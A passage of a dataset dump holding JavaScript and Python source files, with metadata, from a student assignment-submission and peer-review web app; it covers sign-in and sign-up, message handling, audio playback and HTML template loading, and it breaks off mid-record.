"alphanum_fraction": 0.49871334433555603,
"avg_line_length": 22.987653732299805,
"blob_id": "e9864dc28f0c8e3424bf9902acee5ed6a394edba",
"content_id": "4a390bae1e9b549d830d2616fa7a9a6de2823ec7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1943,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 81,
"path": "/js/User.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Model of User info sends information to the server and updates\n* the view depending on what is returned (e.g. signs in or error)**/\nclass User extends Model\n{\n constructor()\n {\n super();\n this.email = \"\";\n this.name = \"\";\n this.surname = \"\";\n this.noun = \"\";\n this.role = \"\";\n this.id = \"\";\n this.log = \"\";\n }\n\n\n update(data, messageType)\n {\n if (data !== \"\" && !Number.isInteger(data))\n {\n if (messageType === net.messageHandler.types.SIGN_IN_SUCCESSFUL ||\n messageType === net.messageHandler.types.SIGN_UP_SUCCESSFUL)\n {\n this.setData(data);\n\n app.assignments.getAllAssignment();\n app.standards.getStandards();\n\n if (data.role === \"student\")\n {\n app.submissions.getPersonalSubmissions(data.id);\n }\n else\n {\n app.submissions.getAllSubmissions();\n }\n\n }\n }\n\n this.notify(messageType);\n }\n\n\n signup(email, teamName, name, surname, noun, password)\n {\n var userData = {};\n\n userData.email = email;\n userData.team_name = teamName;\n userData.name = name;\n userData.surname = surname;\n userData.noun = noun;\n userData.password = password;\n userData.role = \"student\";\n\n net.sendMessage(\"signup\", userData);\n }\n\n signin(email, password)\n {\n var userData = {};\n userData.email = email;\n userData.password = password;\n\n net.sendMessage(\"signin\", userData);\n }\n\n setData(data)\n {\n this.email = data.email;\n this.name = data.name;\n this.surname = data.surname;\n this.noun = data.noun;\n this.role = data.role;\n this.id = data.id;\n this.log = data.log;\n\n }\n}\n"
},
{
"alpha_fraction": 0.7308642268180847,
"alphanum_fraction": 0.7308642268180847,
"avg_line_length": 27.928571701049805,
"blob_id": "69b19370c0525da39e8affe302f82289d529c2ee",
"content_id": "7286326942e6acaa86cfc1ef0660ac85aa093c53",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1620,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 56,
"path": "/js/MessageHandler.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Handles messages**/\nclass MessageHandler\n{\n\tconstructor ()\n\t{\n\t\tthis.types = {\n\t\t\tUPDATE_TABLE: \"update_table\",\n\t\t\tUPDATE_FAILED: \"update_failed\",\n\n\t\t\tSIGN_IN_SUCCESSFUL: \"signin_successful\",\n\t\t\tSIGN_IN_FAILED: \"signin_failed\",\n\n\t\t\tSIGN_UP_SUCCESSFUL: \"signup_successful\",\n\t\t\tSIGN_UP_FAILED: \"signup_failed\",\n\n\t\t\tTEACHER_ASSIGNMENTS_CREATION_SUCCESSFUL: \"teacher_assignments_creation_successful\",\n\t\t\tTEACHER_ASSIGNMENTS_CREATION_FAILED: \"teacher_assignments_creation_failed\",\n\n\t\t\tGET_ASSIGNMENTS_SUCCESSFUL: \"get_assignments_successful\",\n\t\t\tGET_ASSIGNMENTS_FAILED: \"get_assignments_failed\",\n\n\t\t\tASSIGNMENT_DELETE_SUCCESSFUL: \"assignment_delete_successful\",\n\t\t\tASSIGNMENT_DELETE_FAILED: \"assignment_delete_failed\",\n\n\t\t\tSUBMIT_ASSIGNMENT_SUCCESSFUL: \"submit_assignment_successful\",\n\t\t\tSUBMIT_ASSIGNMENT_FAILED: \"submit_assignment_failed\",\n\n\t\t\tGET_SUBMISSIONS_SUCCESSFUL: \"get_submissions_successful\",\n\t\t\tGET_SUBMISSIONS_FAILED: \"get_submissions_failed\",\n\n\t\t\tSUBMIT_REVIEW_SUCCESSFUL:\"submit_review_successful\",\n\t\t\tSUBMIT_REVIEW_FAILED:\"submit_review_failed\",\n\n\t\t\tPUSH_STANDARD_SUCCESSFUL:\"push_standard_successful\",\n\t\t\tPUSH_STANDARD_FAILED:\"push_standard_failed\",\n\n\t\t\tGET_STANDARD_SUCCESSFUL:\"get_standard_successful\",\n\t\t\tGET_STANDARD_FAILED:\"get_standard_failed\"\n\t\t};\n\t}\n\n\thandleMessage (message)\n\t{\n\t\tconsole.log(\"in messagehandler\");\n\t\tvar msg = JSON.parse(message);\n\t\tvar type = msg.type;\n\t\tvar data = msg.data;\n\n\t\tconsole.log(\"Message received:\", type,\"-\", data);\n\n\t\tapp.user.update(data, type);\n\t\tapp.assignments.update(data, type);\n\t\tapp.submissions.update(data, type);\n\t\tapp.standards.update(data, type);\n\t}\n}\n"
},
{
"alpha_fraction": 0.654539942741394,
"alphanum_fraction": 0.6571168899536133,
"avg_line_length": 28.4375,
"blob_id": "f2d6e82998e4b69d01e3f07f751c8a78805101ae",
"content_id": "ecec9caab2a2e88074e35c6ad077c0864cd82517",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 6597,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 224,
"path": "/js/AudioManager.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "function AudioManager()\n{\n\tthis.audioContext={};\n\tthis.audioBuffers=[];\n\n this.resourcePath = \"resources/audio/\";\n\n\tthis.downloadQueue=[];\n\tthis.cache={};\n\tthis.successCount = 0;\n this.errorCount = 0;\n\n // Sounds that are currently playing\n this.playingSounds={};\n\n\ttry {\n \t// Fix up for prefixing (don't have to write \"webkit\" all the time)\n \twindow.AudioContext = window.AudioContext||window.webkitAudioContext;\n \tthis.audioContext = new AudioContext();\n \t}\n catch(e) {\n alert('Web Audio API is not supported in this browser');\n }\n\n}\n\n/**\n * Load the sound file.\n * @param filename - name to refer to sound.\n * @param downloadCallback - function to call.\n */\nAudioManager.prototype.loadSoundFile = function (filename, downloadCallback) {\n\tvar that = this;\n\tvar url = this.resourcePath+filename;\n\t\n\tvar xhr = new XMLHttpRequest();\n\txhr.open('GET', url, true);\n\txhr.responseType = 'arraybuffer';\n \n\txhr.onload = function(e) {\n\t //buffer containing sound returned by xhr\n var arrayBuffer=this.response;\n that.audioContext.decodeAudioData(arrayBuffer, function(buffer) {\n //associate the audio buffer with the sound name so can use the decoded audio later.\n\t that.audioBuffers[filename]=buffer;\n\t that.successCount++;\n\t if (that.isDone()) {\n\t downloadCallback();\n\t }\n }, function(e) {\n that.errorCount++;\n if (that.isDone()) {\n \t downloadCallback();\n }\n console.log('Error decoding file', e);\n });\n };\n\n //send the xhr request to download the sound file\n xhr.send();\n};\n\n/**\n * Plays the list of sounds sequentially.\n * param playlist - contains {name_of_sound, element name to display when the sound finishes}\n */\nAudioManager.prototype.playPlaylist = function(playList, callback) {\n var that = this; \n var sounds = [];\n var currentSound = 0;\n\n for (var [key, value] of playList) {\n console.log(key + \" = \" + value);\n sounds.push(key);\n } \n\n function next() {\n currentSound++;\n if(currentSound < sounds.length) {\n that.playSnippet(sounds[currentSound], next);\n //show picture then show sound\n var elementToDisplay = playList.get(sounds[currentSound]);\n if(elementToDisplay != undefined) {\n app.viewManager.showElement(elementToDisplay);\n }\n }\n else {\n if(callback != undefined) {\n callback();\n }\n }\n }\n\n this.playSnippet(sounds[currentSound], next);\n};\n\n/**\n * Plays sound\n * startTime and duration are optional\n */\n/**\n * Plays a sound. startTime & duration are optional.\n * @param filename - name of a sound and extension.\n * @param volume - sets the volume to play sound at.\n * @param startTime - from where it plays a sound.\n * @param duration - for how long it plays a sound.\n */\nAudioManager.prototype.playSound = function(filename, volume, startTime, duration, callback = null) {\n // No callback\n this.playSnippet(filename, volume, callback, startTime, duration);\n};\n\n/**\n * Plays sound if it has been loaded, otherwise does nothing.\n * @param filename - a name and an extension of the sound to play.\n * @param callback - optional: function to call when sound finishes playing.\n * @param startTime - from where it plays a sound.\n * @param duration - for how long it plays a sound.\n */\nAudioManager.prototype.playSnippet = function(filename, volume, callback, startTime, duration) {\n if (this.audioBuffers[filename] == undefined) {\n return;\n }\n\n // Retrieve the buffer we stored earlier\n var audioBuffer = this.audioBuffers[filename];\n\n // Create a buffer source - used to play once and then a new one must be made\n var source = this.audioContext.createBufferSource();\n source.buffer = audioBuffer;\n source.loop = false;\n\n // Create gain connector to control volume.\n var gainNode = this.audioContext.createGain ? this.audioContext.createGain() : this.audioContext.createGainNode();\n\n // Connect source to it.\n source.connect(gainNode);\n\n // Then connect gain to destination.\n gainNode.connect(this.audioContext.destination);\n\n // Modify volume.\n gainNode.gain.value = volume;\n \n if(callback != undefined) {\n source.onended = callback;\n }\n\n if(startTime != undefined){\n if(duration != undefined) {\n source.start(0, startTime, duration);\n }\n else{\n source.start(0, startTime);\n }\n }\n\n else {\n source.start(0); // Play immideately.\n }\n this.playingSounds[name]=source;\n};\n\n/**\n * Stops a sound.\n * @param filename - a name and an extension of the sound to stop.\n */\nAudioManager.prototype.stopPlayingSound = function(filename) {\n\tif (!this.playingSounds[name]) {\n\t\treturn;\n\t}\n\telse {\n\t\tthis.playingSounds[name].stop(0);\n\t}\n};\n\n/**\n * Plays an empty sound. This is for iOS (user needs to interact e.g. touch a button which\n * causes a sound to be played in order to be able to play sounds without user interaction)\n */\nAudioManager.prototype.playEmptySound = function() {\n\t// Create empty buffer\n\t// https://paulbakaus.com/tutorials/html5/web-audio-on-ios/\n\tvar buffer = this.audioContext.createBuffer(1, 1, 22050);\n\tvar source = this.audioContext.createBufferSource();\n\tsource.buffer = buffer;\n\tsource.connect(this.audioContext.destination);\n\n\t// play the file\n\tsource.start(0);\n};\n\n/**\n * Queues a sound for downloading.\n * @param soundName - name and extension of a file to load.\n */\nAudioManager.prototype.queueSound = function(soundName) {\n\tthis.downloadQueue.push(soundName);\n};\n\n/**\n * Downloads all queued sounds.\n * @param downloadCallback - a function to call once download is complete.\n */\nAudioManager.prototype.downloadAll = function(downloadCallback) {\n for (var i=0; i<this.downloadQueue.length; i++) {\n this.loadSoundFile(this.downloadQueue[i], downloadCallback);\n }\n};\n\n\n//\n// @return {boolean} - whether or not the AudioManager has\n// finished downloading all the sounds.\n/**\n * Checks if the total success count and error count is equal to total sounds to download.\n * @returns {boolean} - whether or not the AudioManager has finished downloading\n * all the sounds.\n */\nAudioManager.prototype.isDone = function() {\n console.log(\"AudioManager success count \" + this.successCount +\" / \"+ this.downloadQueue.length + ' errors: '+ this.errorCount);\n result= (this.downloadQueue.length == this.successCount + this.errorCount);\n return result;\n};\n\n\n\n"
},
{
"alpha_fraction": 0.6905278563499451,
"alphanum_fraction": 0.6905278563499451,
"avg_line_length": 23.263158798217773,
"blob_id": "abbb205347a4783f7f6bb7ed3f5792f0f292893d",
"content_id": "e3449caae66b6473fc1d832b23bbcce4f244627f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1383,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 57,
"path": "/py/user_manager.py",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "from database_manager import DatabaseManager\n\nclass UserManager:\n\tdef __init__(self):\n\t\tprint(\"UserManager: __init__\")\n\t\tself.database_manager = DatabaseManager()\n\n\tdef signin(self, message_data):\n\t\t\"\"\"Returns message type : string\"\"\"\n\t\tprint(\"in user_manager.py\")\n\t\tresult = False\n\t\tmessage_type = \"signin_failed\"\n\t\tdata = {}\n\n\t\ttry:\n\t\t\tresult = self.database_manager.check_password(message_data[\"email\"],message_data[\"password\"])\n\t\texcept:\n\t\t\tmessage_type = \"signin_failed\"\n\n\t\tif result is True:\n\t\t\tmessage_type=\"signin_successful\"\n\t\t\tdata = self.database_manager.get_user_info(message_data)\n\t\t\tusers = self.database_manager.get_all_users()\n\t\t\tdata[\"users\"] = users\n\n\n\n\n\t\treturn [message_type, data]\n\n\tdef signup(self, message_data):\n\t\t\"\"\"Returns message type : string\"\"\"\n\t\tdata = {}\n\t\tmessage_type = \"signup_successful\"\n\n\t\ttry:\n\t\t\tself.database_manager.insert_into_table(\"Users\", message_data)\n\t\t\tdata = self.database_manager.get_user_info(message_data)\n\n\t\texcept:\n\t\t\tmessage_type = \"signup_failed\"\n\n\t\tmessage = [message_type, data]\n\n\t\treturn message\n\n\tdef update_table(self, message_data):\n\t\t\"\"\"Returns message type : string\"\"\"\n\t\tprint(message_data)\n\t\tmessage_type = \"update_table\"\n\t\tdata = message_data\n\t\t# try:\n\t\tself.database_manager.update_table(\"Users\", message_data)\n\t\t# except:\n\t\t# \tmessage_type = \"update_failed\"\n\t\tmessage = [message_type, message_data]\n\t\treturn message\n"
},
{
"alpha_fraction": 0.6274944543838501,
"alphanum_fraction": 0.6274944543838501,
"avg_line_length": 27.1875,
"blob_id": "963432ea27fc41b5c2ee5054216c3bb8f8bad7e0",
"content_id": "6ed13977dccc38912ae54ec2016119a5de373585",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 451,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 16,
"path": "/js/Assignment.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "class Assignment\n{\n constructor(data)\n {\n this.name = data.name;\n this.deadlineTime = data.deadline_time;\n this.deadlineDate = data.deadline_date;\n this.description = data.description;\n this.id = data.id;\n\n this.reviewTillDate = data.review_till_date;\n this.reviewTillTime = data.review_till_time;\n this.reviewersAmounts = data.reviewers_amount;\n this.status = data.status;\n }\n}\n"
},
{
"alpha_fraction": 0.6878612637519836,
"alphanum_fraction": 0.6897880434989929,
"avg_line_length": 23.13953399658203,
"blob_id": "7d0b3d52998b71595141b8e4dc56b5e038a4bc7e",
"content_id": "6d45e415dd3e7c6b9770c8fb3fe5d6e93df0e8b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1038,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 43,
"path": "/views/signin/SigninView.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Responsible for displaying what the user sees**/\nclass SigninView extends View\n{\n\tconstructor(controller)\n\t{\n\t\tsuper();\n\n\t\tthis.title = app.viewManager.VIEW.SIGNIN;\n\t\tthis.controller = controller;\n\t\tthis.setup();\n\t}\n\n\t/**Called whenever the model changes**/\n\tonNotify (model, messageType)\n\t{\n\t\tif(messageType === net.messageHandler.types.SIGN_IN_SUCCESSFUL)\n\t\t{\n\t\t\tvar menuPanel = 0;\n\n\t\t\tif(model.role === \"student\")\n\t\t\t{\n\t\t\t\tmenuPanel = document.getElementById(\"menupanel-student\");\n\t\t\t\tdocument.getElementById(\"mps-assignments-button\").click();\n\t\t\t}\n\n\t\t\telse if (model.role === \"teacher\")\n\t\t\t{\n\t\t\t\tmenuPanel = document.getElementById(\"menupanel-teacher\");\n\t\t\t\tdocument.getElementById(\"mpt-assignments-button\").click();\n\t\t\t}\n\n\n\t\t\tmenuPanel.style.display = \"block\";\n\t\t\tvar viewNameBox = document.getElementsByClassName(\"view-name-box\")[0];\n\t\t\tviewNameBox.style.display = \"block\";\n\t\t}\n\n\t\telse if(messageType === net.messageHandler.types.SIGN_IN_FAILED)\n\t\t{\n\t\t\tthis.controller.showError(\"Details incorrect, please try again!\");\n\t\t}\n\t}\n}\n"
},
{
"alpha_fraction": 0.6356993913650513,
"alphanum_fraction": 0.6377870440483093,
"avg_line_length": 18.5510196685791,
"blob_id": "13eaffdb9c7852b00d0aeca65c2addd2d23c427b",
"content_id": "22b3a7943bf894968db226c893c099a0c4b1c16e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1916,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 98,
"path": "/js/ModalContentManager.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Loads HTML templates, makes them available to the app views**/\nclass ModalContentManager\n{\n\tconstructor()\n\t{\n\t\tthis.cache={};\n\t\tthis.successCount = 0;\n\t \tthis.errorCount = 0;\n\n\t \tthis.modals = [\n\t \t\t\"add-assignment\",\n\t\t\t\"submit-assignment\",\n\t\t\t\"select-review-student\",\n\t\t\t\"rocket-game\"\n\t\t];\n\t}\n\n\n\n\tdownloadAll (downloadCallback)\n\t{\n\t for (var i=0; i<this.modals.length; i++)\n\t {\n\t \t\tthis.downloadModalContent(this.modals[i], downloadCallback);\n\t }\n\t}\n\n\t/**Download a single template and store it**/\n\tdownloadModalContent (contentName, downloadCallback)\n\t{\n\t\tvar that = this;\n\t\tvar url = window.location.href+\"/modals/\"+contentName+\".html\";\n\t\tvar xhr = new XMLHttpRequest();\n\n\t\tconsole.log(\"url: \" + url);\n\n\t\txhr.onload = function()\n\t\t{\n\t\t\tvar el = document.createElement( 'html' );\n\t\t\tel.innerHTML = xhr.responseText;\n\n\t\t\t//get body\n\t\t\tel = el.getElementsByTagName(\"body\")[0];\n\t\t\tconsole.log(\"el: \" + el);\n\n\t\t\t//store the template\n\t\t\tthat.cache[contentName] = el;\n\t\t\tthat.successCount++;\n\n\t\t\tif (that.isDone())\n\t\t\t{\n\t\t\t\tdownloadCallback();\n\t\t\t}\n\t\t};\n\n\t\txhr.onerror = function()\n\t\t{\n\t\t\tthat.errorCount++;\n\n\t\t\tif (that.isDone())\n\t\t\t{\n \t\tdownloadCallback();\n \t\t}\n\t\t};\n\n\t\txhr.open(\"GET\", url);\n\t\txhr.send();\n\t}\n\n\t/**\n\t* Checks if the total success count and error count is equal\n\t* to total templates to download.\n\t* @return {boolean} - whether or not the TemplateManager has\n\t* finished downloading all the HTML templates.\n\t**/\n\tisDone ()\n\t{\n\t console.log(\"ModalContentManager success count \" + this.successCount +\" / \"+ this.modals.length + ' errors: '+ this.errorCount);\n\t var result = (this.modals.length === this.successCount + this.errorCount);\n\n\t return result;\n\t}\n\n\tgetModalContent(name)\n\t{\n\n\t\tvar modalContent = this.cache[name];\n\n\t\tif(modalContent === undefined)\n\t\t{\n\t\t\tconsole.error(name, \"modal content is not defined\");\n\t\t}\n\t\telse\n\t\t{\n\t\t\treturn modalContent.innerHTML;\n\t\t}\n\t}\n}\n"
},
{
"alpha_fraction": 0.6788856387138367,
"alphanum_fraction": 0.6788856387138367,
"avg_line_length": 25.571428298950195,
"blob_id": "ae5ee483b33081205ae02ed1ed9ae793ed2cc97e",
"content_id": "3d87802cc0075844c972756d9098518873ae4afc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2046,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 77,
"path": "/views/signup/SignupController.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Controller for sign up**/\nclass SignupController\n{\n\tconstructor(model)\n\t{\n\t\tthis.model = model;\n\t\tthis.setup();\n\t}\n\n\tsetup()\n\t{\n\t\tvar that = this;\n\n\t\tvar signupButton = document.getElementById(\"signup-button\");\n\t\tvar email = document.getElementById(\"signup-email\");\n\t\tvar name = document.getElementById(\"signup-name\");\n var surname = document.getElementById(\"signup-surname\");\n\t\tvar noun = document.getElementById(\"signup-noun\");\n\t\tvar password = document.getElementById(\"signup-password\");\n\t\tvar passwordConfirm = document.getElementById(\"signup-confirm-password\");\n\n\t\tsignupButton.addEventListener(\"click\", function(){that.signup()} );\n\n\t}\n\n\tsignup(e)\n\t{\n\t\tvar email = document.getElementById(\"signup-email\").value;\n\t\tvar teamName = \"none\";\n\t\tvar name = document.getElementById(\"signup-name\").value;\n \tvar surname = document.getElementById(\"signup-surname\").value;\n\t\tvar noun = document.getElementById(\"signup-noun\").value;\n\t\tvar password = document.getElementById(\"signup-password\").value;\n\t\tvar passwordConfirm = document.getElementById(\"signup-confirm-password\").value;\n\n\t\tif (email !== \"\" && teamName !== \"\" && name !== \"\" && surname !== \"\" && noun !== \"\" && password !== \"\" && passwordConfirm !== \"\")\n\t\t{\n\t\t\tif (password === passwordConfirm)\n\t\t\t{\n\t\t\t\tthis.model.signup(email, teamName, name, surname, noun, password);\n\t\t\t\tthis.cleanSignup();\n\t\t\t}\n\n\t\t\telse\n\t\t\t{\n\t\t\t\tthis.showError(\"Passwords do not match!\");\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tthis.showError(\"You did not fill out everything!\");\n\t\t}\n\n\n\n\t}\n\n\n\tcleanSignup()\n\t{\n\t\t// Clean values\n\t\tdocument.getElementById(\"signup-email\").value = \"\";\n\t\tdocument.getElementById(\"signup-team-name\").value = \"\";\n\t\tdocument.getElementById(\"signup-name\").value = \"\";\n\t\tdocument.getElementById(\"signup-surname\").value = \"\";\n\t\tdocument.getElementById(\"signup-noun\").value = \"\";\n\t\tdocument.getElementById(\"signup-password\").value = \"\";\n\t\tdocument.getElementById(\"signup-confirm-password\").value = \"\";\n\t}\n\n\tshowError(errMessage)\n\t{\n\t\tdocument.getElementById(\"signup-error\").innerHTML = errMessage;\n\t}\n\n\n}\n"
},
{
"alpha_fraction": 0.7302284836769104,
"alphanum_fraction": 0.7334504723548889,
"avg_line_length": 30.03636360168457,
"blob_id": "1b7fddb4517014dd491ded389828e3eb23e4d0a3",
"content_id": "c91ee29a3bd2a03fa19fa4895d1a8e26b111cd73",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3414,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 110,
"path": "/views/assignments-teacher/AssignmentsTeacherController.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "class AssignmentsTeacherController\n{\n\tconstructor(model)\n\t{\n\t\tthis.model = model;\n\t\tthis.setup();\n\t}\n\n\tsetup()\n\t{\n\t\tvar controller = this;\n\t\tconsole.log(this.model);\n\n\t\tvar addBtn = document.getElementById(\"add-assignment-button\");\n\n\n\t\taddBtn.addEventListener(\"click\", function()\n\t\t{\n\t\t\tcontroller.createAddAssignmentModal();\n\t\t});\n\n\t\t// var name = document.getElementById(\"assignment-name\");\n\t\t// var deadline = document.getElementById(\"assignment-submission-deadline\");\n\t\t// var reviewDeadline = document.getElementById(\"assignment-review-deadline\");\n\t\t// var description = document.getElementById(\"assignment-description\");\n\t\t// var reviewersAmount = document.getElementById(\"assignment-total-reviewers\");\n\t\t//\n\t\t// name.addEventListener(\"click\", function(){track(\"assignment-name\")});\n\t\t// deadline.addEventListener(\"click\", function(){track(\"assignment-submission-deadline\")});\n\t\t// reviewDeadline.addEventListener(\"click\", function(){track(\"assignment-review-deadline\")});\n\t\t// description.addEventListener(\"click\", function(){track(\"assignment-description\")});\n\t\t// reviewersAmount.addEventListener(\"click\", function(){track(\"assignment-total-reviewers\")});\n\t}\n\n\n\tcreateAddAssignmentModal()\n\t{\n\n\t\tvar controller = this;\n\n\t\t// Init Modal\n\t\tvar modalBody = app.modalContentManager.getModalContent(\"add-assignment\");\n\t\tvar modalData = app.uiFactory.createModal(\"add-assignment\", \"Add Assignment\", modalBody, true);\n\t\tdocument.body.appendChild(modalData.modal);\n\t\tmodalData.modal.style.display = \"block\";\n\n\t\t//Set minimum datetime and current datetime to now.\n\t\tvar today = new Date().toISOString();\n\t\ttoday = today.substr(0, today.lastIndexOf(\".\"));\n\n\t\tdocument.getElementById(\"assignment-submission-deadline\").min = today;\n\t\tdocument.getElementById(\"assignment-submission-deadline\").value = today;\n\n\t\tdocument.getElementById(\"assignment-review-deadline\").min = today;\n\t\tdocument.getElementById(\"assignment-review-deadline\").value = today;\n\n\n\t\tvar submitBtn = modalData.submit;\n\t\tsubmitBtn.addEventListener(\"click\", function ()\n\t\t{\n\t\t\tcontroller.createAssignment();\n\t\t\tvar parentNode = modalData.modal.parentNode;\n\t\t\tparentNode.removeChild(modalData.modal);\n });\n\n\n\t}\n\n\tcreateAssignment()\n\t{\n\n\t\tvar name = document.getElementById(\"assignment-name\").value;\n\t\tvar deadlineDate = document.getElementById(\"assignment-submission-deadline\").value.split('T')[0];\n\t\tvar deadlineTime = document.getElementById(\"assignment-submission-deadline\").value.split('T')[1];\n\t\tvar reviewTillDate = document.getElementById(\"assignment-review-deadline\").value.split('T')[0];\n\t\tvar reviewTillTime = document.getElementById(\"assignment-review-deadline\").value.split('T')[1];\n\n\t\tvar totalColons = deadlineTime.split(\":\").length-1;\n\t\t// Remove seconds\n\t\tif (totalColons === 2) {\n\t\t\tdeadlineTime = deadlineTime.substring(0, deadlineTime.lastIndexOf(\":\"));\n\t\t}\n\n\n\t\ttotalColons = reviewTillTime.split(\":\").length-1;\n\t\t// Remove seconds\n\t\tif (totalColons === 2) {\n\t\t\treviewTillTime = reviewTillTime.substring(0, reviewTillTime.lastIndexOf(\":\"));\n\t\t}\n\n\n\t\tvar description = document.getElementById(\"assignment-description\").value;\n\t\tvar reviewersAmount = document.getElementById(\"assignment-total-reviewers\").value;\n\n\n\t\tthis.model.createAssignment(name, deadlineTime, deadlineDate,reviewTillTime, reviewTillDate, description, reviewersAmount);\n\t}\n\n\tdeleteAssignment(id)\n\t{\n\t\tthis.model.deleteAssignment(id);\n\t}\n\n\n\n\tupdate()\n\t{\n\n\t}\n}\n"
},
{
"alpha_fraction": 0.6533433198928833,
"alphanum_fraction": 0.6548374891281128,
"avg_line_length": 21.123966217041016,
"blob_id": "4530ea166046d62379e68b7da0f960c67e391c09",
"content_id": "e92bf9ffb10083db431cf7e721e5e0f24d48311d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2677,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 121,
"path": "/js/TemplateManager.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Loads HTML templates, makes them available to the app views**/\nclass TemplateManager\n{\n\tconstructor()\n\t{\n\t\tthis.downloadQueue = [];\n\t\tthis.cache={};\n\t\tthis.successCount = 0;\n\t \tthis.errorCount = 0;\n\t}\n\n\t/**Queue a template for downloading**/\n\tqueueTemplate (templateName)\n\t{\n\t\tthis.downloadQueue.push(templateName);\n\t}\n\n\t/**\n\t* Downloads all templates\n\t* @param {function} downloadCallback\n\t* function called when all the templates are downloaded\n\t**/\n\tdownloadAll (downloadCallback)\n\t{\n\t for (var i=0; i<this.downloadQueue.length; i++)\n\t {\n\t \t\tthis.downloadTemplate(this.downloadQueue[i], downloadCallback);\n\t }\n\t}\n\n\t/**Download a single template and store it**/\n\tdownloadTemplate (templateName, downloadCallback)\n\t{\n\t\tvar that = this;\n\t\tvar url = window.location.href+\"/views/\"+templateName+\"/\"+templateName+\".html\";\n\t\tvar xhr = new XMLHttpRequest();\n\n\t\tconsole.log(\"url: \" + url);\n\n\t\txhr.onload = function()\n\t\t{\n\t\t\tvar el = document.createElement( 'html' );\n\t\t\tel.innerHTML = xhr.responseText;\n\n\t\t\t//get body\n\t\t\tel = el.getElementsByTagName(\"body\")[0];\n\t\t\tconsole.log(\"el: \" + el);\n\n\t\t\t//store the template\n\t\t\tthat.cache[templateName] = el;\n\t\t\tthat.successCount++;\n\n\t\t\tif (that.isDone())\n\t\t\t{\n\t\t\t\tdownloadCallback();\n\t\t\t}\n\t\t};\n\n\t\txhr.onerror = function()\n\t\t{\n\t\t\tthat.errorCount++;\n\n\t\t\tif (that.isDone())\n\t\t\t{\n \t\tdownloadCallback();\n \t\t}\n\t\t};\n\n\t\txhr.open(\"GET\", url);\n\t\txhr.send();\n\t}\n\n\t/**\n\t* Checks if the total success count and error count is equal\n\t* to total templates to download.\n\t* @return {boolean} - whether or not the TemplateManager has\n\t* finished downloading all the HTML templates.\n\t**/\n\tisDone ()\n\t{\n\t console.log(\"TemplateManager success count \" + this.successCount +\" / \"+ this.downloadQueue.length + ' errors: '+ this.errorCount);\n\t var result= (this.downloadQueue.length == this.successCount + this.errorCount);\n\n\t return result;\n\t}\n\n\t/**\n\t * Processes template e.g. corrects the path to the image resources.\n\t * @param {Object} - the HTML template as DOM\n\t * @return {Object} - the processed HTML template as DOM\n\t **/\n\tprocessTemplate (template)\n\t{\n\n\t}\n\n\tloadFromCache()\n\t{\n\t\tfor(var index in this.cache)\n\t\t{\n\t\t\t//add root element for this view\n\t\t\tvar divNode = document.createElement(\"div\");\n\t\t\tdivNode.id = index;\n\t\t\tdocument.body.appendChild(divNode);\n\t\t\tvar view = this.cache[index];\n\n\t\t\tif(index == undefined)\n\t\t\t{\n\t\t\t\tconsole.error(\"Trying to use a view that doesn't exist. Check the this.title in your views exist in ViewManager.VIEW\");\n\t\t\t}\n\t\t\telse if(view == undefined)\n\t\t\t{\n\t\t\t\tconsole.error(this.title +\" view is not defined\");\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tdivNode.innerHTML = this.cache[index].innerHTML;\n\t\t\t}\n\t\t}\n\t}\n}\n"
},
{
"alpha_fraction": 0.646661639213562,
"alphanum_fraction": 0.6474118232727051,
"avg_line_length": 19.507692337036133,
"blob_id": "0a9c79c4ec70184cb84f7bac66a4cfe1e58d6bc4",
"content_id": "82d584fdd2dc2272b43e467ed882cf40224589ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1333,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 65,
"path": "/js/ViewManager.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
